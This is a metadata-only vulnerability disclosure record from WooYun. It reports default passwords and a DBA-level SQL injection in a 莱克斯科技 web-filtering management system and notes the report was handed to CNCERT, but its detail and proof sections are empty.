最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0102342

漏洞标题：莱克斯科技上网行为管理系统存在默认口令及SQL注入DBA权限(案例中全校师生隐私告急)

相关厂商：莱克斯科技（北京）有限公司

漏洞作者： 路人甲

提交时间：2015-03-19 15:08

修复时间：2015-06-22 08:58

公开时间：2015-06-22 08:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0102342"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云